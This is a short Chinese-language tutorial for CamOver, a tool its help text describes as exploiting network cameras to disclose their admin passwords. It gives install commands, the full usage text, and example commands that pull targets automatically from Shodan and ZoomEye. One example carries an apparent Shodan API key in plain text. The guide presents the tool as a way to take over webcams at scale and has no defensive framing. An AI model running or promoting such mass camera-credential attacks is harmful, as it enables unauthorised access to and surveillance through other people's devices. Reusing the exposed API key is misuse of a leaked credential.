1.快速安装
git clone https://github.com/EntySec/CamOver
pip3 install git+https://github.com/EntySec/CamOver
如果你是Windows,请使用
git clone https://github.com/EntySec/CamOver
pip install git+https://github.com/EntySec/CamOver
2.使用帮助
usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
[--zoomeye ZOOMEYE] [-p PAGES]
CamOver is a camera exploitation tool that allows to disclosure network camera
admin password.
optional arguments:
-h, --help 显示这个帮助信息并退出
-t, --threads 启用多线程模式以获得更好的性能
-o OUTPUT, --output OUTPUT
将结果存储至文件
-i INPUT, --input INPUT
地址输入文件
-a ADDRESS, --address ADDRESS
提供单个地址
--shodan SHODAN 通过网络利用远程设备所使用的Shodan API密钥
--zoomeye ZOOMEYE 通过网络利用远程设备所使用的ZoomEye API密钥
-p PAGES, --pages PAGES
需要通过ZoomEye获取的页面数量
camover可以通过shodan和zoomeye自动获取目标,如下
camover --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
你也可以换成你自己的api
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
使用-t快速获取
3.小结
以上是camover工具的使用帮助,可以用来接管你的web摄像头。
谢谢阅读。。